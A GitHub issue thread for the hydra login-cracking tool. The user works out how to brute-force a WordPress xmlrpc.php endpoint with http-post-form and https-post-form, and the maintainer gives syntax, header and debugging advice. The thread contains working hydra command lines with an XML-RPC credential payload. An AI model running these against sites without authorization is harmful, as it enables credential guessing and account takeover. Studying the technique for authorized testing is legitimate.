### ISSUE TITLE
http-post module –– with xml snippet

### ISSUE THREAD

**Issue by maxnes-des** [vanhauser-thc/thc-hydra#751]
Hello VanHauser-thc

I try to hack the xmlrpc.php of my Wordpress-site using the hydra http-post module 
I have to attach a xml-snippet and insert username and password into it:

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>

using the correct user and pass my hydra line looks like this:
`hydra -l test -p 1234_1234 www.mydomain.de -v http-post "/xmlrpc.php:<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>user=^USER^</value></param><param><value>pass=^PASS^</value></param></params></methodCall>:S=isAdmin"`
the way I insert the value for user and pass into the xml snippet is wrong and I get the answer "optional parameters must have the format X=value". 
So my question is how can I assign  the ^USER^ and the ^PASS^ to the `<value>` tag in the xml-snippet?

many thanks for answering : )

- Kali Linux on UTM Mac M1
- Hydra v9.3

**Comment by vanhauser-thc** [comment]
http-post-form not http-post, different protocol

**Comment by maxnes-des** [comment]
Hello Vanhauser, 

thank you for guiding me into the right direction. The protocol seems to works better now. 
But I am still stucked in assigning the ^USER^ and ^PASS^ to the 2 values tags in the xml script below.
```
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>
```
Any idea how to do that? Where to put the script within the http-post-form syntax

`<url>:<form parameters>:<condition string>[:<optional>[:<optional>]`

many thanks in advance for your time

**Comment by vanhauser-thc** [comment]
use the -d switch to see what is sent to the server, this way you can easily adapt your command line paramter.
that <methodcall> etc. is the post paramter stuff. simply `<param><value>^USER^</value></param>` etc. will work. Usually this also needs the option `:H=Content-Type: something` because what you are sending is xml and the server must be told about this

**Comment by maxnes-des** [comment]
Hello Vanhauser,

I used the -d switch and could see that the correct xml with User and Pass was send    : )
I also added the :H=Content-Type\: xml; charset=UTF-8
so it looks like this:

```
$ hydra -l test -p 1234_1234 www.xxxx.de http-form-post '/xmlrpc.php:<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>^USER^</value></param><param><value>^PASS^</value></param></params></methodCall>:S=isAdmin:H=Content-Type\: xml; charset=UTF-8' -d
```

but still no getting the answer 1 password found.
Maybe because wordpress is answering with this xml-response


```
HTTP/2 200 OK
Date: Thu, 05 May 2022 11:46:23 GMT
Server: Apache/2.4.53 (Unix)
X-Powered-By: PHP/7.4.29
X-Robots-Tag: noindex, follow
Cache-Control: max-age=172800
Expires: Sat, 07 May 2022 11:46:23 GMT
Accept-Ranges: none
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml; charset=UTF-8
Content-Length: 659
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><struct>
  <member><name>isAdmin</name><value><boolean>0</boolean></value></member>
  <member><name>url</name><value><string>https://www.xxxxx.de/</string></value></member>
  <member><name>blogid</name><value><string>1</string></value></member>
  <member><name>blogName</name><value><string>xxxx</string></value></member>
  <member><name>xmlrpc</name><value><string>https://www.xxxx.de/xmlrpc.php</string></value></member>
</struct></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse
```

does the :S=isAdmin work for this?

**Comment by vanhauser-thc** [comment]
depends on what the server sends. better is to capture a request + reply from the browser and then modeling the request to hydra

**Comment by maxnes-des** [comment]
Hi Vanhauser,

I tried a lot and still no success. 
I added all the stuff from the header using this request header from firefox.

```
Host: xxxxx.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: _ga=xxxxxxx
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Origin: https://xxxxxx.de
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
```

the syntax at the end for the header is for instance, correct?
`:H= Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8`

does hydra understand the answer in `<?xml version="1.0" encoding="UTF-8"?>`
and when I set the `:S=isAdmin` from inside the xml-answer 

any idea what to try next
Thank you : )

**Comment by vanhauser-thc** [comment]
no space after the equal sign: ":H=Accept\:"

isAdmin would work. you can try it by doing something like `cat reply.txt | netcat -lnvp 80` and pointing hydra there (not https!) and adding :G=: in the options. should tell you login+pw correct.

basically you just have to check if the request being sent by hydra looks exactly the same as the one the browser sends. the -d switch dumps the request to the server (and the reply)

**Comment by vanhauser-thc** [comment]
no, hydra does not use http/2. I think you can disable http/2 in firefox somehow. but that is unlikely the issue. more likely you are missing something like a token needed to be fetched, cookie, ...

**Comment by maxnes-des** [comment]
Hi vanhauser-thc
I wanted to let you know, that I finally succeeded. 
telling me to compare the hydra request with the browsers request gave me the correct direction. at the end I had to address the https so I used the https-post-form with the flag for the https port `-s 443` and immediately it worked. 
thanks for all your help, stay save
